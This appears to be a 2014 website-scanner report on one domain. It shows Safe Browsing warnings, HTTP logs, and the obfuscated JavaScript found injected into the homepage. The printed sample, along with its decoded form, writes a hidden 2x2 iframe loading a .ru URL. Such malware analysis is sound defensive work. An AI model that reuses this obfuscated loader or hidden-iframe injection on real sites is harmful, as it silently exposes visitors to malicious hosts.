Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=matthewsusmel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://matthewsusmel.com/ | 200 OK Content-Length: 1950 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="117.100.900.1110.891.1170.981.1010.990.1160.414.1190.1026.1050.1044.1010.360.390.540.1050.918.1140.873.1090.909.320.1035.1140.891.610.306.1040.1044.1160.1008.580.423.470.972.1170.900.1050.1044.1080.873.460.1026.1170.423.990.999.1170.990.1160.450.480.414.1120.936.1120.306.320.990.970.981.1010.549.340.756.1190.945.1160.1044.1010.1026.340.288.1150.891.1140.999.1080.972.1050.990.1030.549.340.873.1170.1044.1110.306.320.918.1140.873.1090.909.980.999.1140.900.1010.1026.610.306.1100.999.340.288.970.972.1050.927.1100.549.340.891.1010.990.1160.909.1140.306.320.936.1010.945.1030.936.1160.549.340.450.340.288.1190.945.1000.1044.1040.549.340.450.340.558.600.423.1050.918.1140.873.1090.909.620.351.410.531.130.90".split(".");h=2;s="";if(window["document"])for(i=0;-161+i<0;i=1+i){k=i;s=s+String.fromCharCode(n[k]/(i%(h)+9));}if(012===10)e(s);} Decoded script: document.write('<iframe src="http://luditla.ru/count20.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://luditla.ru/count20.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://luditla.ru/count20.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://luditla.ru/count20.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://luditla.ru/count20.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://matthewsusmel.com/test404page.js | 404 Not Found Content-Length: 487 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: matthewsusmel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:42:21 GMT
Accept-Ranges: bytes
ETag: "79e-4c52e77ce0300"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1950
Content-Type: text/html
Last-Modified: Thu, 19 Jul 2012 13:07:56 GMT
...1950 bytes of data.
GET / HTTP/1.1
Host: matthewsusmel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:42:21 GMT
Accept-Ranges: bytes
ETag: "79e-4c52e77ce0300"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1950
Content-Type: text/html
Last-Modified: Thu, 19 Jul 2012 13:07:56 GMT
...1950 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: matthewsusmel.com
Referer: http://www.google.com/search?q=matthewsusmel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: matthewsusmel.com
Referer: http://www.google.com/search?q=matthewsusmel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.